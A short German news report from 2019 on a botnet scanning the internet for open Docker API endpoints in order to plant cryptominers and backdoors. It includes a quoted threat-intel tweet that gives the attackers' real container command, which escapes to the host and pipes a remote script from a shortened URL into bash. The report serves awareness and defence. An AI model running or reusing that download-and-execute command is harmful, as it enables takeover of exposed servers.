Cyberkriminelle scannen Internet nach offenen Docker-API-Endpunkten
(Quelle: Pixabay/B_A)
26. November 2019 -
Offenbar wird das Internet von Cyberkriminellen nach offenen API-Endpunkten von Docker-Instanzen abgesucht. Werden offene Endpunkte gefunden, dann werden Kryptominer installiert.
Im Internet läuft zurzeit eine riesige Scanning-Aktion durch Cyberkriminelle. Diese suchen gemäss "Zdnet" nach offenen API-Endpunkten von Docker-Instanzen. Entdeckt wurden die Scans zuerst am Wochenende vom 24. November. Auffallend war vor allem das Ausmass der Scanning-Aktivitäten. Das für die Aktion zuständige Botnetz hat über 59'000 IP-Netzwerke ins Visier genommen, um offene Docker-Endpunkte zu finden. Ziel ist offenbar, Kryptominer auf nicht gesicherten Docker-Instanzen zu installieren. Gleichzeitig werden die Abwehrmechanismen der Docker-Instanz ausgeschaltet. Darüber hinaus hinterlassen die Hacker offenbar Backdoors auf den infizierten Instanzen, um später wieder darauf zugreifen zu können.
Den Docker-Admins wird deshalb geraten, ihre Installationen nach offenen Endpunkten abzusuchen und nicht ordnungsgemäss laufende Container abzuschalten.
(luc)
Den Docker-Admins wird deshalb geraten, ihre Installationen nach offenen Endpunkten abzusuchen und nicht ordnungsgemäss laufende Container abzuschalten.
Opportunistic mass scanning activity detected targeting exposed Docker API endpoints.
— Bad Packets Report (@bad_packets) 25. November 2019
These scans create a container using an Alpine Linux image, and execute the payload via:
"Command": "chroot /mnt /bin/sh -c 'curl -sL4 https://t.co/q047bRPUyj | bash;'",#threatintel pic.twitter.com/vxszV5SF1o
(luc)